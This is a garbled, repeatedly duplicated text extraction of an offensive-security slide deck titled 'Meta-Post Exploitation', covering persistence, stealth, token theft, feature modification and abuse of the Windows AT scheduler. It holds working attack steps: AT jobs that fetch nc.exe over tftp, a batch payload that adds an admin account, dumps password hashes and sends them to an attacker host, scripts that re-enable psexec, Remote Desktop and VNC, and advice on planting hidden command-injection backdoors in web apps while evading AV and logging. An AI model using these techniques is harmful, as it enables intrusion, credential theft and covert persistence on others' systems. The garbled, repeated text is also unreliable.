bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 13: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 13

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 26

Persistence

bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form

fieldsndash If Name = John Smith and Age = 42 then execute

contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to

find

Slide 27

Persistence

bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

• MassNetUse – Establish NetBIOS session credentials on a range of hosts

• MassWinenum – Enumerate NetBIOS information, bypass certain RestrictAnonymous settings

• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts

Slide 66

• DEMOS

Slide 67

• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)

Slide 68

• Acknowledgements
  – Thanks to:
    • All the people from the offensivecomputing, nologin and uninformed IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work

Slide 69

• Questions?
• Presentation available at www.offensivecomputing.net

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 14: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 26

Persistence

bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form

fieldsndash If Name = John Smith and Age = 42 then execute

contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to

find

Slide 27

Persistence

bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 15: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

